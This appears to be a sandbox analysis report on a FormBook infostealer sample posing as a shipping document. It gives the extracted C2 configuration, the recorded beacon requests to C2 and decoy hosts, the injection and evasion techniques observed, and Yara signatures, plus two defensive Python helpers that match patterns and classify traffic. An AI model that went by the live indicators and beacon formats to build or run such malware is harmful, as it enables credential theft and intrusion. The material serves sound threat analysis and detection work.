Analysis Report SHIPPING DOCUMENT.exe

Overview

General Information

Sample Name: SHIPPING DOCUMENT.exe
Analysis ID: 404217
MD5: 25e847b9631bc2fe8d87fe4278fa142e
SHA1: 641756a84fdce68e101a53cfa6809b68190b7ad7
SHA256: 70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
Tags: exe

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • SHIPPING DOCUMENT.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
    • SHIPPING DOCUMENT.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5752 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6948 cmdline: /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

19 further memory dump entries are not reproduced in this extract.

Unpacked PEs

Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

13 further unpacked PE entries are not reproduced in this extract.
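The Yara listings above give the raw bytes behind the matches, and two details are worth pulling out: the three JPCERT/CC strings are each a 5-byte push imm32, and every yara-signator sequence sits exactly 0xE00 bytes lower in 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack than in 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack. The Python below is an added example, not part of the report or of either rule set: it re-implements a minimal offset-reporting scanner for these hex strings, decodes the push constants, and checks that the offset shift is one constant for every hit (the usual file-versus-memory section realignment, consistent with .raw.unpack being the dump as it sat in memory and .unpack the copy rebuilt to file layout). The scanned buffer is constructed for the demo; reading the push constants as FormBook's identifiers for the three sqlite3 exports follows the rule's own string names.

```python
import struct

# Hex strings copied from the report's Yara Overview: three from rule "Formbook" (JPCERT/CC)
# and $sequence_0 from rule "Formbook_1" (yara-signator).
PATTERNS = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
}

# Offsets the report gives for the same strings in the two dumps of the injected image at
# 0x400000: ".raw.unpack" (memory as dumped) and ".unpack" (rebuilt to file layout).
OFFSETS_RAW_UNPACK = {"$sequence_0": [0x98e8, 0x9b62], "$sequence_1": [0x15685],
                      "$sequence_5": [0xa57a], "$sequence_9": [0x1c32a]}
OFFSETS_UNPACK = {"$sequence_0": [0x8ae8, 0x8d62], "$sequence_1": [0x14885],
                  "$sequence_5": [0x977a], "$sequence_9": [0x1b52a]}


def hex_to_bytes(hexstr):
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf, patterns):
    """Plain-bytes equivalent of YARA's string listing: {name: [offsets]} for every hit."""
    hits = {}
    for name, hexstr in patterns.items():
        needle, offs, start = hex_to_bytes(hexstr), [], 0
        while True:
            i = buf.find(needle, start)
            if i < 0:
                break
            offs.append(i)
            start = i + 1          # keep going so overlapping hits are not lost
        hits[name] = offs
    return hits


def push_imm32(hexstr):
    """Decode a 5-byte 'push imm32' (opcode 0x68) to the little-endian constant it pushes.
    The three JPCERT strings are exactly this shape; their names tie each constant to one
    sqlite3 export (FormBook locates these routines by a constant, not by the export name)."""
    raw = hex_to_bytes(hexstr)
    if len(raw) != 5 or raw[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", raw[1:])[0]


def layout_delta(a, b):
    """Difference between two offset listings of the same strings. One constant for every
    hit means both dumps hold the same bytes shifted by a section's VirtualAddress minus
    PointerToRawData; more than one value means the dumps genuinely differ."""
    deltas = {x - y for name in a for x, y in zip(a[name], b[name])}
    return deltas.pop() if len(deltas) == 1 else None


def build_sample():
    """Constructed image for the demo: zero padding with the report's patterns planted at
    0x10 and 0x40 ($sqlite3step), 0x20 ($sqlite3text) and 0x60 ($sequence_0)."""
    buf = bytearray(0x80)
    for off, name in ((0x10, "$sqlite3step"), (0x40, "$sqlite3step"),
                      (0x20, "$sqlite3text"), (0x60, "$sequence_0")):
        raw = hex_to_bytes(PATTERNS[name])
        buf[off:off + len(raw)] = raw
    return bytes(buf)


if __name__ == "__main__":
    for name, hexstr in PATTERNS.items():
        if hexstr.startswith("68 "):
            print(f"{name}: push 0x{push_imm32(hexstr):08X}")
    print("hits:", scan(build_sample(), PATTERNS))
    print("raw.unpack minus unpack: 0x%X" % layout_delta(OFFSETS_RAW_UNPACK, OFFSETS_UNPACK))
```

The practical consequence: byte patterns such as these match in both layouts, but any YARA condition written with `at` offsets against the on-disk unpack will not fire on a memory dump of the same image, and vice versa.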

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook (the full configuration is reproduced under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll; ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: SHIPPING DOCUMENT.exe; Virustotal: Detection: 34%
Source: SHIPPING DOCUMENT.exe; ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match; File source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: SHIPPING DOCUMENT.exe; Joe Sandbox ML: detected
Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: SHIPPING DOCUMENT.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: SHIPPING DOCUMENT.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Note: RELOCS_STRIPPED together with DYNAMIC_BASE means the loader has no relocation table to apply, so the image is loaded at its preferred base and ASLR does not take effect for it despite the flag.
Source: Binary string: netstat.pdbGCTL; source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb; source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP; source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb; source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe; Code function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe; Code function: 0_2_0040659C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe; Code function: 0_2_004027A1 FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.knighttechinca.com/dxe/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic; HTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1; Host: www.barkinlot.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: seven NUL bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1; Host: www.buyruon.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: seven NUL bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1; Host: www.fuerzaagavera.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: seven NUL bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1; Host: www.union-green.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: seven NUL bytes, nothing printable)
Note: all four check-in hosts (barkinlot.com, buyruon.com, fuerzaagavera.com, union-green.com) appear in the configuration's decoy list, not in its C2 list; the request path /dxe/ and the two query parameter names (k0GxOl, NX1TzP) are identical in every request, and no User-Agent header is sent.
Source: Joe Sandbox View; IP Address: 64.190.62.111
Source: Joe Sandbox View; ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: unknown; DNS traffic detected: queries for: www.barkinlot.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: SHIPPING DOCUMENT.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SHIPPING DOCUMENT.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp; String found in binary or memory: http://www.yabovip1288.com
Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp; String found in binary or memory: https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5
Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp; String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe; Code function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
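All four check-in hosts seen on the wire (www.barkinlot.com, www.buyruon.com, www.fuerzaagavera.com, www.union-green.com) are decoy entries from the extracted configuration, not the configured C2 www.knighttechinca.com, while the path /dxe/ and the two query parameter names are identical in every request. The Python below is an added example, not part of the report or of any vendor tooling: it loads the configuration (abridged to the decoys needed here, values unchanged), normalises hosts so that bare config entries match www.-prefixed Host headers, classifies each observed request as c2, decoy or unknown, and extracts the per-build constants (path, parameter names, second parameter value) that hold across all hosts. That those constants are stable for a build is this example's assumption, drawn only from the four requests in the report.

```python
import json
from urllib.parse import urlsplit

# Abridged copy of the FormBook configuration the sandbox extracted (the report lists
# 64 decoys; only the ones needed for this demo are kept, values unchanged).
CONFIG_JSON = r'''{"C2 list": ["www.knighttechinca.com/dxe/"],
 "decoy": ["sardarfarm.com", "959tremont.com", "fuerzaagavera.com",
           "buyruon.com", "union-green.com", "barkinlot.com", "houseofsisson.com"]}'''

# The four check-in requests from the report's Networking section: (Host header, request line).
OBSERVED_REQUESTS = [
    ("www.barkinlot.com",
     "GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1"),
    ("www.buyruon.com",
     "GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1"),
    ("www.fuerzaagavera.com",
     "GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1"),
    ("www.union-green.com",
     "GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1"),
]


def registrable(host):
    """Lower-case and drop a leading 'www.': the config lists decoys bare ('barkinlot.com')
    while the Host header carries 'www.', so a naive string compare would miss every one."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def load_config(text):
    cfg = json.loads(text)
    c2 = {}
    for entry in cfg["C2 list"]:               # 'www.knighttechinca.com/dxe/'
        host, _, path = entry.partition("/")
        c2[registrable(host)] = "/" + path     # -> '/dxe/'
    return {"c2": c2, "decoy": {registrable(d) for d in cfg["decoy"]}}


def classify_request(host, request_line, cfg):
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    # Split the query by hand: parse_qsl would turn '+' inside the opaque value into spaces.
    params = [p.split("=", 1) if "=" in p else [p, ""] for p in parts.query.split("&") if p]
    h = registrable(host)
    role = "c2" if h in cfg["c2"] else "decoy" if h in cfg["decoy"] else "unknown"
    return {
        "host": h,
        "role": role,
        "method": method,
        "path": parts.path,
        "path_is_c2_path": parts.path in cfg["c2"].values(),
        "param_names": tuple(k for k, _ in params),
        "param_values": tuple(v for _, v in params),
    }


def checkin_fingerprint(results):
    """Values that stay constant across all check-ins whatever host they go to: the path,
    the two parameter names and the second parameter's value. These survive the decoy
    rotation, so they make a better network IOC than any single decoy domain."""
    paths = {r["path"] for r in results}
    names = {r["param_names"] for r in results}
    second = {r["param_values"][1] for r in results if len(r["param_values"]) > 1}
    if len(paths) == len(names) == len(second) == 1:
        return {"path": paths.pop(), "param_names": names.pop(), "second_param": second.pop()}
    return None


def summarise(cfg, requests):
    results = [classify_request(h, line, cfg) for h, line in requests]
    return results, checkin_fingerprint(results)


if __name__ == "__main__":
    cfg = load_config(CONFIG_JSON)
    results, fp = summarise(cfg, OBSERVED_REQUESTS)
    for r in results:
        print(f"{r['host']:22} {r['role']:7} {r['method']} {r['path']}")
    print("per-build check-in fingerprint:", fp)
```

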